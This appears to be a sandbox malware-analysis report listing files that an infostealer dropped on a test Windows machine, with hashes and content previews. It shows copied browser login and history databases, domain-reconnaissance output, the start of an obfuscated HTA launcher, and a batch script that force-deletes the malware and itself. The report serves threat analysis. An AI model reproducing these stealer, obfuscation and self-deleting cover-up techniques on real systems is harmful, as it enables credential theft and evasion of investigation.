Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\edgelogindata1613010003112314374.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\history2691481611001630006.sqlite

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\history3555401926381422489.sqlite

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\hsperfdata_user\1600

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3020479989024867
Encrypted:	false
SSDEEP:	96:mjbrWxz8G6FwMy6r4I28IkurB8kQRKx4JmrudKaV089:mj68G6FwMy6BI50RgkN
MD5:	C3D8DE755F5C68CDE6D6F9D0DBA25377
SHA1:	0B3C1CA6548B1B76EFD5F932E7CD6EB7BA67CA2B
SHA-256:	EE5E4B17BAE5E6ABDBD15CF6B938F809B3C0CB5E6822F97CAB41DDFBBDA97F15
SHA-512:	84BD687618DFB9D2FCE2D004812EF7EBDA197FD86FDD66935269E8726686AFADF23AC2D23287C4D7F3E3BC0448177FD5CCF26807F6F3AB879C46D8B65D3DA495
Malicious:	false
Preview:	........X:.............. .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...

C:\Users\user\AppData\Local\Temp\hsperfdata_user\3580

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3157513065692907
Encrypted:	false
SSDEEP:	96:Xy0rRro8GRYHelZE69+ERwJSFQJ/3GrBjkQRKx4JmrudKaV08YLt:Xyao8GiHelZE6/Ql3e5RgkI5
MD5:	E014D57EE0C27D39185E2DCA87384694
SHA1:	7F6CF3F52514ADB7DEB064F83FDE8D7B1EAE6874
SHA-256:	7351AF399DE6B148F5B75B880994F1B9A407502022C733A2F42C345D5EA59A27
SHA-512:	9695A22228854945DB820446FDBA565526B325E13FD9C3E1F0F28FA21614B0C7C4AE7A587E040740A597806E15B455717591C735D34E7A7DE6B9D772D8D9D0CD
Malicious:	false
Preview:	........X:......O....... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...

C:\Users\user\AppData\Local\Temp\hsperfdata_user\6952

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3162658733151262
Encrypted:	false
SSDEEP:	96:6ybrKq8GyyyIT6rXI28IFporByPkQRKx4JmrudKaV08rX:6yB8GyyyIT6oIXYYRgkT
MD5:	244E509B14769FCDBB076E8BBE8D7001
SHA1:	2AF39649BF867B5CC40C6EFD939C473291914F77
SHA-256:	10C1C7A57320C71A509C7B777299375ED0CD68E7D62A3CFD6049C08274DF2D74
SHA-512:	387F4CD45CB50EF8B54A70FDEB8618BB192101F2980720376589C5A24859CB5699F092B24770FF4E730F3762F42C36A304D3C7872051448E4CAF31A0872A63E3
Malicious:	false
Preview:	.........:........f..... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...

C:\Users\user\AppData\Local\Temp\hsperfdata_user\6996

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3163440680558618
Encrypted:	false
SSDEEP:	96:2KF5rMA8G/5agr2Q6ZPwMPW8IbC+rB2AkQRKx4JmrudKaV08/6:1Fr8GBagiQ6nIpBRgki
MD5:	417935315F3EA3595C556169D96690DA
SHA1:	24E8A877993F0BE6E5D94E7FF7B5EAE875322630
SHA-256:	969C1406BBB55FD008ABE758D33C847519B175D37F4040B386C752275BA7B8D8
SHA-512:	9F82FBD9074EB7A539AFDD2AD7E61513AE94E89B0F03FECCA45C00D27730D480219DE9DB069DCED8F9F278A4AF62BD811C1A1980CB58E05B5AB2D4B30F7C4B86
Malicious:	false
Preview:	........X:.............. .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...

C:\Users\user\AppData\Local\Temp\jna-1820491375\jna549618974871912275.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211456
Entropy (8bit):	6.575564255266613
Encrypted:	false
SSDEEP:	3072:hsYkXwUGMpSFif9jejzCvjrEt1++W9WCrHudSzoNyLXX4Fv/IK9znaTsXvXs9GT5:hFLNmyjzss1++kQCo2XM5vXs9GTqZc
MD5:	676F82A561FAFEEC6D8CF6D8319DEE2D
SHA1:	01759BB9E7DD8513C1D25BAFF2C8AB3298DB720D
SHA-256:	1B06CBA48EEA2AD4881BC88A2749E40500DBC87C1A2149290EB61D473A64E4C1
SHA-512:	6E9F4087A49CB15203A6A478C6F3422276018F269ED85833AF6F203604C60C6C443298734CDE217E8DF18EBB932994AAAA3BC794A36419EEBCC4310CAABFB826
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 06012025_1416_bombastic.hta, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: 6XAaqIWeJt.jar, Detection: malicious, Browse Filename: 6XAaqIWeJt.jar, Detection: malicious, Browse Filename: synapse.jar, Detection: malicious, Browse Filename: synapse.jar, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!:..@T..@T..@T..(W..@T..(Q.S@T..(P..@T..4Q..@T..4P..@T..4W..@T..(U..@T..@U..@T..4W..@T..@T..@T..4P..@T..4T..@T..4V..@T.Rich.@T.........PE..L...6..c...........!.....N..........?R.......`............................................@.............................T...$...<....@.......................P... ..\|...................................@............`..0............................text....M.......N.................. ..`.rdata...\|...`...~...R..............@..@.data...\Q.......D..................@....rsrc........@......................@....reloc... ...P..."..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sqlite-3.41.2.1-8817147a-097f-4350-b036-bfca281522c2-sqlitejdbc.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	861184
Entropy (8bit):	6.588115507839371
Encrypted:	false
SSDEEP:	24576:+a0UZiGiqc4M/gCf9cs+2jI5oRSzALtuT6J7YWmzWJR:++ZiGiqcD/gCrjI5oRRLtu+5tzD
MD5:	56D1DB1F16FE70B7E62DA6F75F4DC1C8
SHA1:	D09099428B05F795FBD03CE8DD79B985D5A12AA7
SHA-256:	4E50F5CF965D86573E0FDEAD13853A2E6D30B61E60B1ED91C917ACCC7CACADFC
SHA-512:	1449907A775FCCDB39B3B08247F31464E7D422DA6417288AAFBD4CE05F686A0D67623ADA43290307D3FD0E0A76C8D923A71E679A0A54D5BDF5F9894B24FAA149
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 06012025_1416_bombastic.hta, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.P... ...............`....,q.........................p......B.....@... ..............................................................0..D?..................................................8................................text...4N.......P..................`.P`.data....&...`...(...T..............@.`..rdata..$G.......H...\|..............@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls......... ......................@.0..reloc..D?...0...@..................@.0B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sqlite-3.47.1.0-ccc74718-bc89-47f4-b3d2-0b12eb48d763-sqlitejdbc.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	924160
Entropy (8bit):	6.5746173833909145
Encrypted:	false
SSDEEP:	24576:vFFT4+TUWOCgwzIVdI7h9vh6SJHGcZvv7BKK7CIeP2nh:zBTLgwX9vh2Yvv7TCR2h
MD5:	CC7025D951889144CF04D8F4853F54C1
SHA1:	F2C5AEDFF475CF375E34EA93696B5AE9D8B9B4F5
SHA-256:	C42CC546F482F7CB1988EE594C0B8F562861E0D88A08F7884420E7360DD81849
SHA-512:	3CBE83988500139C48260613A2602CD6FDF09E064AA89CC3CBE29D1EC2010400C059C75D7CC8C0E9EA4351FD6DF536729F4227B2817518A33C978649B31052BF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...&.,...................@.....o.........................p.......7....@... .........................\|.................................... ..(C.................................................D................................text...........,..................`..`.data.......@...,...0..............@....rdata...X...p...Z...\..............@..@.bss.....................................edata..\|...........................@..@.idata..............................@....CRT....,...........................@....tls................................@....reloc..(C... ...D..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	98682
Entropy (8bit):	6.445287254681573
Encrypted:	false
SSDEEP:	1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
MD5:	7113425405A05E110DC458BBF93F608A
SHA1:	88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
SHA-256:	7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
SHA-512:	6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
Malicious:	false
Preview:	0...u0...\...0....H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...\|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	737
Entropy (8bit):	7.501268097735403
Encrypted:	false
SSDEEP:	12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
MD5:	5274D23C3AB7C3D5A4F3F86D4249A545
SHA1:	8A3778F5083169B281B610F2036E79AEA3020192
SHA-256:	8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
SHA-512:	FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
Malicious:	false
Preview:	0...0.....0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0....H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R.......~....)....i.n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\83aa4cc77f591dfc2374580bbd95f6ba_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	data
Category:	dropped
Size (bytes):	45
Entropy (8bit):	0.9111711733157262
Encrypted:	false
SSDEEP:	3:/lwlt7n:WNn
MD5:	C8366AE350E7019AEFC9D1E6E6A498C6
SHA1:	5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
SHA-256:	11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
SHA-512:	33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
Malicious:	false
Preview:	........................................J2SE.

C:\Users\user\AppData\Roaming\Microsoft\UProof\start.hta

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (2540), with CRLF line terminators
Category:	dropped
Size (bytes):	9877
Entropy (8bit):	5.297852423343185
Encrypted:	false
SSDEEP:	192:uf/ucDXw8pcU7fcdY+eqN9292B2Ve28kGpiqfOssWkhbVVCyUweOm0x:uf/ucDBpc82Ym/292B2c28kGpzOjWkhP
MD5:	2632D4A005A4284B64CE56C35CD3DF5C
SHA1:	19D522E9F8516D032F53BFA62881F8E28B2E1A58
SHA-256:	2432584CD8BA5284FE551463DFDA9744A5969F6AFEAA7A841B1D289AA46AE2FC
SHA-512:	522DAF2B7843AFE00CD0DFCAF295263F25857010DDF7C939DE35CE4F1DAF7DE64172BCDBB239A9E094BA1735984D1CD563649D8F02D768C0C00650142601BA92
Malicious:	false
Preview:	<html>..<head>.. <title>Launch</title>.. <HTA:APPLICATION.. ID="Launcher".. APPLICATIONNAME="Launch".. SINGLEINSTANCE="yes".. WINDOWSTATE="minimize".. SHOWINTASKBAR="no".. SYSMENU="no".. BORDER="none".. INNERBORDER="no".. SCROLL="no".. SELECTION="no".. CONTEXTMENU="no".. />.. <script language="javascript">.. var _0xcc93,onLoad,_0x3665;..(function()..{...function l(a,b)...{....return a< b...}...function u()...{....return ActiveXObject...}...function q()...{....return d...}...function r()...{....return e...}...function w()...{....return window...}...function m(a,b)...{....return a== b...}...function n(a,b)...{....return a=== b...}...function k(a,b)...{....return a/ b...}...function v()...{....return parseInt...}...function p()...{....return c...}...function y(a)...{....return -a...}...function h(a,b)...{....return a* b...}...function i(a,b)...{....return a+ b...}...function j(a,b)...{....retur

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\user-PC-user-domaininfo.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	260
Entropy (8bit):	4.377420188805819
Encrypted:	false
SSDEEP:	6:EK6MKx8kLFzbKAr2NoenN7zLMH4XKkONoenN5iwMfTF8zLMH4XKq:hKx/WR1ndnvKkO1n7Mx8nvKq
MD5:	6789EFB6DD0AB0C0D9D9BA6C2B49C25B
SHA1:	FBFCE522F95DAD53BA0E793CD123AFA9595B5F64
SHA-256:	A7CB91019999FA4456A8C93645BC18B2FCE39E699993D3DBE69A3C1253856FBE
SHA-512:	54BB1779294D5980AB970AFE06705A814D445A321DA81EC62C98F42A0546876AF3F81BABDC4E5708D3D135A9161AF7A06BBF18C8EB4775E2723D2E7B185FB814
Malicious:	false
Preview:	===== Domain Information Report =====..Unable to determine the domain name...Current User is NOT a member of the Domain Administrators group...Current User is NOT a member of the Remote Desktop Users group...No users found in the Domain Administrators group...

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\deleteHTAandSelf.bat

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	186
Entropy (8bit):	5.041636507023928
Encrypted:	false
SSDEEP:	3:mKDDcRJI2Rqw4oSJjwlNN2+WIXL72pwjwJ5PN+EaKC5SufzPDs0AtsRy49QFy:hv2Mo6sNN2RIXOW4PN7aZ5SubPctwy4T
MD5:	2ABCE0C838A0A31259E5A62067281D74
SHA1:	CB5C30526AF27205F11C5B7D73EFF7E16CBF37CB
SHA-256:	04E0E6278FF917645F50B39684A1752AC3F77D488A7E4F6753F9A86B015D63FC
SHA-512:	30FBF46198D34963CEDF6A5FA20FF2D76E26EC8A9C026C99DDA2DE47F78400A2B650923228834A072DDE192A97E2A0236D30F551B300E61C5743A97331BEF2E5
Malicious:	true
Preview:	@echo off ..timeout /t 5 /nobreak ..DEL /F /Q """C:\Users\user\Desktop\malw.hta""" ..DEL /F /Q "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\deleteHTAandSelf.bat" ..EXIT ..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\history-910646-user.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	258
Entropy (8bit):	1.3666795623285437
Encrypted:	false
SSDEEP:	3:pUEOdIVtMW8o1VdIVn:zOdIV+WjVdIVn
MD5:	53EB82B83A1251C1A0AFE147DE40A285
SHA1:	F64056ED8CB0422F190131B6E059C0BEF088C1F8
SHA-256:	5004955EC2384B347776246C87F464BFEF3911E7E165BF7001854EA713D062E9
SHA-512:	714872A47F5C37022940ADEB774761CCCE0A2FC460E6AEC88CA499E79B54CF2B9A008A6FE0F928B434C2344560080984119C967A7EDD4653F39EF74B3568EB3C
Malicious:	false
Preview:	History from Chrome:.-----------------------------------------------------..-----------------------------------------------------.History from Edge:.-----------------------------------------------------..-----------------------------------------------------.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\COPYRIGHT

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	3245
Entropy (8bit):	4.5075430634149685
Encrypted:	false
SSDEEP:	96:WkjJXQSqgbiihCrRbo+Q/cV0rDcFBL3P0/r3:WcAaOi01E+xV0rDaBL3P0z3
MD5:	65FBF4C8ECA0F41FDEA7421ACED6DBCE
SHA1:	0D126BABAF941979FFDE366838E17F7566ED7E51
SHA-256:	4AA8378CE746AF6EE0086964E3A74C5E8EBEDF2845360310C5EC87D07FF08AA2
SHA-512:	266C3F9F213A0C462739710EB1036403FE6D44555204B4374664F189388DB3A8181C0B29BDB0DDC0DD28B45A06F07FE30DFFD347FBF0676F8E581548A6BD4AC5
Malicious:	false
Preview:	Copyright . 1993, 2024, Oracle and/or its affiliates..All rights reserved...This software and related documentation are provided under a.license agreement containing restrictions on use and.disclosure and are protected by intellectual property laws..Except as expressly permitted in your license agreement or.allowed by law, you may not use, copy, reproduce, translate,.broadcast, modify, license, transmit, distribute, exhibit,.perform, publish, or display any part, in any form, or by.any means. Reverse usering, disassembly, or.decompilation of this software, unless required by law for.interoperability, is prohibited...The information contained herein is subject to change.without notice and is not warranted to be error-free. If you.find any errors, please report them to us in writing...If this is software or related documentation that is.delivered to the U.S. Government or anyone licensing it on.behalf of the U.S. Government, the following notice is.applicable:..U.S. GOVERNMENT END U

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\LICENSE

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.202972243293108
Encrypted:	false
SSDEEP:	3:c3AXFshzYoQ6LJMXTn:c9hzYey
MD5:	2C311F1936F63834199DE94319A5CD8C
SHA1:	6C5F8A9EBAB689F905FEFE44ACA0A1F77D39E425
SHA-256:	2D5EC5B2984090D43BFB27C331B59BB537FBBBC9B5E015F1F94A5978372D293F
SHA-512:	E8A51E80F98098F601130D556AE42AF6A9162B382820A4D5AD7FEF9D68270626384B440E41E3208ACD0A61103404454FF5FBE6E0B5D1434ED759667ED7E5B8DF
Malicious:	false
Preview:	Please refer to https://java.com/otnlicense.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\README.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.197049999347145
Encrypted:	false
SSDEEP:	3:c3AXFshzhRSkU:c9hzhgkU
MD5:	0F1123976B959AC5E8B89EB8C245C4BD
SHA1:	F90331DF1E5BADEADC501D8DD70714C62A920204
SHA-256:	963095CF8DB76FB8071FD19A3110718A42F2AB42B27A3ADFD9EC58981C3E88D2
SHA-512:	E9136FDF42A4958138732318DF0B4BA363655D97F8449703A3B3A40DDB40EEFF56363267D07939889086A500CB9C9AAF887B73EEAD06231269116110A0C0A693
Malicious:	false
Preview:	Please refer to http://java.com/licensereadme.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.503253675672093
Encrypted:	false
SSDEEP:	3:YOc6XJKoQAEkBAzprMC9iRFGEjS1FfJGHmEhQhMy8yA/MGuPX+WJg6HY4AXe8rAv:e8EoQLkBAdrMC9iRVjMFwGyQhMBy4Hov
MD5:	F3AF2718F86B00497FA423046F50CEE6
SHA1:	0FF70AAD905069978C0D83728621FC982FD492FA
SHA-256:	4E4079BD53B742D9D6F18FBD06F743C28285F1E4B9FFD636D2D24A70A2EE7F00
SHA-512:	FFA6A3098182084D9D563274BD30C5F55EA0F7C9F9AB4DC8CD1664B971D0CF03BFC8061E19D1BDA6A4591B100A87B74F26AA1BDBFECCBC1EA195AF809A8C49FA
Malicious:	false
Preview:	The licenses for Third Party components included with this product can.be found under the /legal/javafx subdirectory. Each component's license.is available as a separate markdown (.md) file.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\THIRDPARTYLICENSEREADME.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.470612255387289
Encrypted:	false
